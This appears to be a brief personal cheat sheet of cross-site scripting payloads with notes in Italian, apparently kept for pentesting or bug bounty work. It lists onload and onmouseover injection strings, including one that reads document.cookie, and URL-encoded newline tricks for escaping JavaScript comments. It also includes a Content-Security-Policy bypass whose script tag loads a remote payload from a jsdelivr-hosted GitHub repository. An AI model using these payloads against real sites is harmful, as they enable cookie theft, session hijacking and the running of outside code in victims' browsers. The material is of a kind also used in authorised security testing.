<svg/onload=alert('XSS')>
<BODY ONLOAD=alert('XSS')>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
%0A newline url encoded per mandare a capo il tuo payload. In caso ci sia un commento // %0Aalert(1)
a%0Aalert('XSS');//
script-src https://cdn.jsdelivr.net
<script src="https://cdn.jsdelivr.net/gh/michele0303/payload-xss@main/jsdelivr-fetch.js"></script>
``
``
``
``
``
``
``
https://xn4k.github.io/pentest/bug%20bounty/ethical%20hacking/XSS-Filter-Evasion-Cheat-Sheet/ https://portswigger.net/web-security/cross-site-scripting/cheat-sheet